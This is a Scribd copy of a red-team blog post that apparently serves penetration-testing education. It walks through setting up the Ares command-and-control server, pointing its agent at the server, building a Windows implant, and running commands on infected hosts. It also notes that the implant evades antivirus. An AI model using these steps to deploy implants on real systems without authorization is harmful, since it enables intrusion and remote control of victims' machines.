Scribd
Upload
30 views10 pages

Command and Control - Web Interface

This document discusses the command and control tool Ares, which is written in Python and has a web interface that runs on port 8080. It is password and passphrase protected. The tool was developed by Kevin Locati and allows for listing infected agent hosts, changing passwords, and disconnecting agents. It has basic functionality through its main interface containing only those three functions.

Uploaded by

brunodiaz2038
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
30 views10 pages

Command and Control - Web Interface

This document discusses the command and control tool Ares, which is written in Python and has a web interface that runs on port 8080. It is password and passphrase protected. The tool was developed by Kevin Locati and allows for listing infected agent hosts, changing passwords, and disconnecting agents. It has basic functionality through its main interface containing only those three functions.

Uploaded by

brunodiaz2038
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

Command and Control – Images Search the Lab


Search...
Command and Control – JavaScript

Author
January 3, Command and Control – Web Interface
2018
netbiosX Red Team Ares, C2, Command and Control, Red Team Leave a
comment
netbiosX

The high demand of Red Team assessments has increased the interest of security
companies and consultants to develop command and control tools with different Follow PenTest Lab
capabilities. Some of these tools can be used and in official engagements while some
others have been developed only for research purposes. Enter your email address to follow this blog and
receive notifications of new posts by email.
Ares is a command and control tool which is written in Python and it was developed by
Kevin Locati. It has a web interface which runs on port 8080 and it is password and Join 1,667 other followers
passphrase protected. The database must be created in advance of running the server.
Enter your email address
1 ./ares.py initdb
2 ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Follow

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Recent Posts
Command and Control – Browser
SPN Discovery
Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP

Categories
Coding (10)
Defense Evasion (20)

Ares – Server Exploitation Techniques (19)


External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
Mobile Pentesting (7)
Network Mapping (1)
Post Exploitation (12)
Privilege Escalation (14)
Red Team (27)
Social Engineering (11)
Tools (7)
VoIP (4)
Web Application (14)
Wireless (2)

Ares – Password Setup Archives

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Once the password is set Ares will ask for a Passphrase to be used. June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
August 2017
July 2017
June 2017
May 2017
April 2017
March 2017
February 2017
January 2017
November 2016
September 2016
February 2015
Ares – Passphrase
January 2015
July 2014
The main interface of Ares contains only three functions:
April 2014
1. Agent List June 2013
2. Change Password May 2013

3. Disconnect April 2013


March 2013

The Agent List is the page of where all the infected hosts running the implant will appear. February 2013
January 2013
December 2012
November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
#BSidesLDN2018 was great so far! Many thanks to
@dradisfw for the ticket #dradis #greatproduct
6 hours ago
Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
7 hours ago
Ares – Main Interface RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
The config.py in the agent folder controls the settings of the agent. Before anything else Finally a social engineering talk #BSidesLDN2018
the SERVER variable must be changed to the IP address that the command and control https://t.co/jMMk4lvbcH 7 hours ago
server is running. [New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
#Redteam 9 hours ago

Follow @netbiosX

Pen Test Lab Stats


3,030,655 hits

Blogroll

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Tricks 0

Exploit Databases
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Ares – Agent Configuration
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0
If wine is installed (Ares repository contains wine setup script) then the agent can be built
in an executable format by running the following command:
Pentest Blogs
1 ./builder.py -p Windows --server http://192.168.1.203:8080 -o
Carnal0wnage Ethical Hacking Tutorials 0
Coresec Pentest tutorials,Code,Tools 0
Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Ares – Creating Agent Professional

Hosts that are running the agent will appear on the agent list in the following format. The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London


April 29th, 2014

The big day is here.

Ares – List of Agents Facebook Page

Commands can be executed on the target hosts from a field and the output will be
Penetrati…
retrieved in a console window. 9.9K likes

Like Page

Be the first of your friends to


like this

Ares – Command Execution – ipconfig

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Advertisements

Ares – Command Execution – List of Users

Ares except of some basic command execution on the target host doesn’t offer other
capabilities. However the agent has at the time being low detection rate against a number
of antivirus.

Agent – Detection Rate

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Advertisements

Rate this:

Rate This

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Share this:

 Twitter  Facebook 123  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
Be the first to like this.

Related

Command and Control - Lateral Movement - Lateral Movement - RDP


Browser WinRM In "Red Team"
In "Red Team" In "Red Team"

Leave a Reply

Enter your comment here...

Command and Control – Images

Command and Control – JavaScript

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Create a free website or blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like